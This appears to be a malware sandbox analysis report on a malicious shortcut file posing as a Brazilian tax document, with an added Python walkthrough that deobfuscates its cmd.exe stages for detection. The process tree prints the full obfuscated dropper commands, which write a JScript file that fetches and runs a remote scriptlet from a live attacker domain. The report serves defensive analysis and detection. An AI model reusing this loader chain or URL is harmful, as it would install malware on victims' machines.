Analysis
max time kernel: 187s
max time network: 192s
platform: windows10-2004_x64
resource: win10v2004-20221111-en
resource tags: arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
submitted: 06/12/2022, 11:09
Static task: static1
Behavioral task: behavioral1
  Sample: RelatorioIRPF2022x_763.59941234.894541.08054.lnk
  Resource: win7-20221111-en
Behavioral task: behavioral2
  Sample: RelatorioIRPF2022x_763.59941234.894541.08054.lnk
  Resource: win10v2004-20221111-en
General
Target: RelatorioIRPF2022x_763.59941234.894541.08054.lnk
Size: 493B
MD5: 5d675c77ace428b2959c9579f4e3605c
SHA1: b50d3aa98338a52c047a6cc0399046b8e65c8178
SHA256: 0d43d8d11bc22acb24fd9b02ed43fa2e40ba29f07272d278a33d412782435119
SHA512: 3ae5e8445781b77852fd6d6cdc07459e531865418a91f5a008dd0934ed160db26a4a39fb5c5ed725a9670cfe76ab34a2f61cf5a61278aeb49a7d4dd5c04c32a8
Malware Config
Signatures
Blocklisted process makes network request (3 IoCs)
  flow  pid   Process
  31    1728  WScript.exe
  35    1728  WScript.exe
  36    1728  WScript.exe
Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  description        ioc                                                                                                 Process
  Key value queried  \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation  cmd.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation  cmd.exe
Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Modifies registry class (1 IoCs)
  description  ioc                                                                                   Process
  Key created  \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings  cmd.exe
Suspicious use of WriteProcessMemory (8 IoCs)
  description                       pid   Process  procid_target
  PID 3196 wrote to memory of 3876  3196  cmd.exe  84
  PID 3196 wrote to memory of 3876  3196  cmd.exe  84
  PID 3876 wrote to memory of 2560  3876  cmd.exe  85
  PID 3876 wrote to memory of 2560  3876  cmd.exe  85
  PID 3876 wrote to memory of 656   3876  cmd.exe  86
  PID 3876 wrote to memory of 656   3876  cmd.exe  86
  PID 656 wrote to memory of 1728   656   cmd.exe  87
  PID 656 wrote to memory of 1728   656   cmd.exe  87
Processes (indented by depth in the process tree)
C:\Windows\system32\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\RelatorioIRPF2022x_763.59941234.894541.08054.lnk
  PID: 3196
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /V/D/c "md C:\ZUn9AOQ\&&s^eT SBFF=C:\ZUn9AOQ\^ZUn9AOQ&&S^Et NGOR=v2C7ar CDl3="sc"+"^r";DDl3="i^p"+"t^:2C7h";EDl3="T"+"t^P"+":";G2C7et^Ob^j2C7ec^t(CDl3+DDl3+EDl3+'&&s^ET E67=HTXCAHTXCAwaew.tnemllorne.cyouHTXCA?1HTXCA');&&s^Et/^p V8JJ="!NGOR:2C7=!!E67:HTXCA=/!"<n^ul > !SBFF!.^jS|ca^ll c^a^ll !SBFF!.jS"
    PID: 3876
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" sEt/p V8JJ="var CDl3="sc"+"^r";DDl3="i^p"+"t^:h";EDl3="T"+"t^P"+":";GetObject(CDl3+DDl3+EDl3+'//waew.tnemllorne.cyou/?1/');" 0<nul 1>C:\ZUn9AOQ\ZUn9AOQ.jS"
      PID: 2560
    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" call call C:\ZUn9AOQ\ZUn9AOQ.jS "
      PID: 656
      - Checks computer location settings
      - Modifies registry class
      - Suspicious use of WriteProcessMemory
      C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\ZUn9AOQ\ZUn9AOQ.jS"
        PID: 1728
        - Blocklisted process makes network request
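The process tree above is a staged cmd.exe obfuscation. The second stage (PID 3876) runs with /V (delayed expansion), stores the script text in environment variables padded with junk tokens (2C7, HTXCA) and caret escapes, then uses `set /p ... <nul > file` to write the cleaned text to C:\ZUn9AOQ\ZUn9AOQ.jS while the other side of the pipe `call`s that file, so WScript.exe runs it through the .jS file association. The Python below is an added worked example, not part of the tria.ge report: it takes the PID 3876 command line verbatim and re-derives what PID 2560 received, what landed in the dropped file, and the GetObject moniker that file resolves to. `strip_carets` and `delayed_expand` are this example's own minimal models of cmd.exe's phase-2 caret handling and /V `!VAR:old=new!` substitution (an assumption: they cover only what this sample uses, not the full cmd.exe parser), and nothing here touches the network.

```python
"""Re-derive the obfuscated cmd.exe stages from the PID 3876 command line.

Added example; not code from the tria.ge report. strip_carets() and
delayed_expand() are simplified models of cmd.exe parsing (assumption:
sufficient for this sample, not a complete parser).
"""
import re

# /c argument of the second-stage cmd.exe (PID 3876), outer quotes removed
# as cmd.exe does for a /c string that contains more than two quotes.
STAGE2_ARG = r"""md C:\ZUn9AOQ\&&s^eT SBFF=C:\ZUn9AOQ\^ZUn9AOQ&&S^Et NGOR=v2C7ar CDl3="sc"+"^r";DDl3="i^p"+"t^:2C7h";EDl3="T"+"t^P"+":";G2C7et^Ob^j2C7ec^t(CDl3+DDl3+EDl3+'&&s^ET E67=HTXCAHTXCAwaew.tnemllorne.cyouHTXCA?1HTXCA');&&s^Et/^p V8JJ="!NGOR:2C7=!!E67:HTXCA=/!"<n^ul > !SBFF!.^jS|ca^ll c^a^ll !SBFF!.jS"""

_DELAYED = re.compile(r'!([A-Za-z0-9_]+)(?::([^=!]+)=([^!]*))?!')


def strip_carets(s):
    """cmd.exe caret pass (simplified): outside double quotes `^x` -> `x`;
    inside a quoted run the caret is kept. Quote state toggles on every `"`.
    This is why `"^r"` survives stage 2 while `G^et^Ob^j...` loses its carets."""
    out, quoted, i = [], False, 0
    while i < len(s):
        c = s[i]
        if c == '"':
            quoted = not quoted
        elif c == '^' and not quoted and i + 1 < len(s):
            i += 1
            c = s[i]
        out.append(c)
        i += 1
    return ''.join(out)


def delayed_expand(s, env):
    """/V delayed expansion: `!VAR!` and `!VAR:old=new!` (substring replace;
    an empty `new` deletes `old`). Expanded text is not rescanned, which is
    why the carets stored inside NGOR reach the next cmd.exe intact."""
    def repl(m):
        value = env[m.group(1)]
        if m.group(2) is not None:
            value = value.replace(m.group(2), m.group(3))
        return value
    return _DELAYED.sub(repl, s)


def run_stage2(arg):
    """Walk the `&&` chain: collect each `set`, then return the expanded
    final pipeline (left: the set /p writer, right: `call call <file>`)."""
    env, pipeline = {}, None
    for raw in arg.split('&&'):
        cmd = delayed_expand(strip_carets(raw), env)
        m = re.match(r'\s*set\s+(\w+)=(.*)', cmd, re.I)
        if m:
            env[m.group(1)] = m.group(2)
        elif '|' in cmd:
            left, right = cmd.split('|', 1)
            pipeline = (left.strip(), right.strip())
    return env, pipeline


def set_p_output(cmd):
    """What `set /p VAR="prompt" <nul > file` writes: the prompt minus its
    leading quote and last quote, after the child cmd.exe's own caret pass
    (the carets next to the string fragments are now unquoted and vanish)."""
    cmd = strip_carets(cmd)
    return re.match(r'\s*set\s*/p\s+\w+="(.*)"', cmd, re.I).group(1)


def eval_js_concat(js):
    """Resolve the dropped JScript without a script engine: it only holds
    `NAME="a"+"b";` assignments and one GetObject(...) whose argument is a
    `+` chain of those names and a single quoted literal."""
    names = {}

    def expr(e):
        parts = []
        for t in e.split('+'):
            t = t.strip()
            parts.append(t[1:-1] if t[0] in '"\'' else names[t])
        return ''.join(parts)

    for name, rhs in re.findall(r'(\w+)=((?:"[^"]*"\+?)+);', js):
        names[name] = expr(rhs)
    return expr(re.search(r'GetObject\(([^)]*)\)', js).group(1))


def reconstruct():
    """Full chain: stage-2 expansion -> dropped file -> GetObject moniker."""
    env, (writer, launcher) = run_stage2(STAGE2_ARG)
    dropped = set_p_output(writer)
    return {
        "dropped_path": re.search(r'>\s*(\S+)', writer).group(1),
        "dropped_js": dropped,
        "moniker": eval_js_concat(dropped),
        "launcher": launcher,
    }


if __name__ == "__main__":
    for key, value in reconstruct().items():
        print(f"{key}: {value}")
```

The recovered argument is `script:hTtP://waew.tnemllorne.cyou/?1/`. A `script:` moniker passed to GetObject is resolved by scrobj.dll, which fetches the URL and executes it as a scriptlet, so the three WScript.exe flows under "Blocklisted process makes network request" and the 107-byte file under Downloads are the fetch of that remote scriptlet rather than the LNK itself doing anything further on disk. For detection purposes, the stable pieces are the `set /p ... <nul >` writer feeding a `.js` path, `call call <file>` as the launcher, and WScript.exe calling out immediately after; the variable names, junk tokens and directory name are per-sample.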
Network
MITRE ATT&CK Enterprise v6
Downloads
Filesize: 107B
MD5: 29cf655d6b28293d388268e308f7b554
SHA1: d43da5881b3968e81ba3e5e61f580c5f860302d9
SHA256: 776fee39e41f81d10fa08c53fedf90716c97b5483d158c2fdbd5053a85e6d207
SHA512: eeabd784e408e4f62e35994e89acb5c94418548b4ba56b4ebaf2c15891a04aa587b32c1ac3449cbe58e5525d536890c0d17f754bf36ca00725461b9068d9d0df